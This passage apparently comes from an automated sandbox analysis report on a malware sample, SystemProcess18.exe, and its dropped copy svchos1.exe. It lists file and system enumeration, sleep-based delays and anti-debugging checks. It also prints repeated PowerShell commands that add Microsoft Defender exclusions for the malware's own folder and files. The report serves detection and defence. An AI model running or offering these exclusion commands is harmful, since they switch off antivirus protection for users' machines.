          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006E6AD8 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,28_2_006E6AD8
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035EB250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,28_2_035EB250
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C92B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,28_2_035C92B0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C9090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,28_2_035C9090
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C97D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,28_2_035C97D0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C9B60 FindFirstFileA,FindClose,FindClose,28_2_035C9B60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035CBD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,28_2_035CBD60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C9C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,28_2_035C9C40
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_006E6AD8 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,29_2_006E6AD8
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_010529AD FindFirstFileExW,29_2_010529AD
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030AB250 lstrcat,lstrcat,lstrcat,FindFirstFileA,GetPrivateProfileStringA,lstrlen,strstr,GetPrivateProfileStringA,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,FindNextFileA,FindClose,29_2_030AB250
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030892B0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,29_2_030892B0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03089090 lstrlen,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,29_2_03089090
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030897D0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,29_2_030897D0
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03089B60 FindFirstFileA,FindClose,FindClose,29_2_03089B60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0308BD60 FindFirstFileA,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,29_2_0308BD60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03089C40 FindFirstFileA,FindClose,CloseHandle,CreateFileA,29_2_03089C40
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035C8E60 GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlen,lstrlen,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlen,28_2_035C8E60
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035DB360 Sleep,GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,GetDriveTypeA,GetDiskFreeSpaceExA,GetTickCount,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLastInputInfo,GetTickCount,_access,lstrcpy,28_2_035DB360
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 100000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 111000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 103000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 31000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 88000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 142000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 35000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 109000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 106000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 130000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 82000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 34000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 102000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 33000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 144000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 32000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 93000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 101000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 143000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 146000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 118000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 131000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 89000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 125000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 140000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 81000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 132000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 116000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 112000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 80000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 110000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 123000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 149000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 114000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 107000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 90000Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeThread delayed: delay time: 115000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: SystemProcess18.exe, 00000000.00000003.1877734457.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.1878106626.0000000000F0B000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.2495372253.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.2606394143.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.2938109988.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.2816405961.0000000000F0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm
          Source: SystemProcess18.exe, 00000000.00000003.1877734457.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.1878106626.0000000000F0B000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000000.00000003.2495145201.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1490622674.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1707154787.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1596189606.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1644579055.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1497498025.0000000000971000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\Public\Documents\MM\svchos1.exeAPI call chain: ExitProcess graph end nodegraph_28-104363
          Source: C:\Users\Public\Documents\MM\svchos1.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Users\Public\Documents\MM\svchos1.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035D7530 BlockInput,BlockInput,BlockInput,28_2_035D7530
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007B804D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_007B804D
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E1A50 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Sleep,28_2_035E1A50
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007C24A8 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,28_2_007C24A8
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: 0_3_03DE0031 mov eax, dword ptr fs:[00000030h]0_3_03DE0031
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_03480031 mov eax, dword ptr fs:[00000030h]28_2_03480031
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_03A70031 mov eax, dword ptr fs:[00000030h]28_2_03A70031
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_00980031 mov eax, dword ptr fs:[00000030h]29_2_00980031
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_02980031 mov eax, dword ptr fs:[00000030h]29_2_02980031
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035CA590 LocalAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlen,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,GetProcessHeap,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapFree,FreeLibrary,htons,inet_ntoa,wsprintfA,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,GetProcessHeap,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlen,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,htons,inet_ntoa,wsprintfA,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseHandle,LocalFree,LocalFree,LocalFree,FreeLibrary,LocalReAlloc,28_2_035CA590
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess token adjusted: Debug
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007B804D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_007B804D
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007B1103 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_007B1103
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_007B804D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_007B804D
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_007B1103 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_007B1103
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0104B13E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0104B13E
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0104342A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0104342A
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_01042F35 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_01042F35

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'"
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'"Jump to behavior
